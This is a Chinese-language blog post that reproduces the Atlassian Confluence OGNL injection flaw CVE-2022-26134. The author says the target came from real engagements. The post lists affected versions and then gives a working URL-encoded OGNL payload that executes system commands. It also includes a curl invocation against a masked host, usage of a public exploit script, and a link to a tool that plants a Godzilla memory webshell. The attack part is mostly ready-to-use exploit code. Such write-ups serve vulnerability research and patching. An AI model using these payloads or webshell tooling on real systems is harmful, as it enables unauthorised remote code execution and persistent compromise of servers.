Confluence OGNL注入漏洞复现(CVE-2022-26134)
Confluence OGNL注入漏洞复现(CVE-2022-26134)
原创 Hacker 0xh4ck3r 2025-01-23 03:20
Confluence OGNL注入漏洞复现(CVE-2022-26134)
影响范围
Confluence Server&Data Center ≥ 1.3.0
Atlassian Confluence Server and Data Center <7.4.17 Atlassian Confluence Server and Data Center <7.13.7 Atlassian Confluence Server and Data Center <7.14.3 Atlassian Confluence Server and Data Center <7.15.2 Atlassian Confluence Server and Data Center <7.16.4 Atlassian Confluence Server and Data Center <7.17.4 Atlassian Confluence Server and Data Center <7.18.1
漏洞成因
Atlassian Confluence存在远程代码执行漏洞,2022年6月2日,Atlassian发布安全公告,公布了一个Confluence Server和Data Center中的远程代码执行漏洞。详细分析可参考:
https://www.anquanke.com/post/id/274026
漏洞利用
环境准备
|
|
|
|---|---|
|
|
|
|
|
|
此处的靶机是我在实战里遇到的,另外该漏洞vulhub还未曾引入。
靶机截图如下:
image-20220729145604908
漏洞复现
手动复现
POC:
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/
测试:
curl -vv "http://xxx.xxx.xxx.xxx:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/"
可以看到如下图所示:
image-20220729152043723
工具复现
准备好生成POC工具:cve-2022-26134.py
工具地址:https://github.com/Nwqda/CVE-2022-26134
然后执行下方的命令:
python cve-2022-26134.py "http://xxx.xxx.xxx.xxx:8090/" "id"
image-20220729152816186
可以看到此漏洞利用成功!
附:一键连接哥斯拉生成工具:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL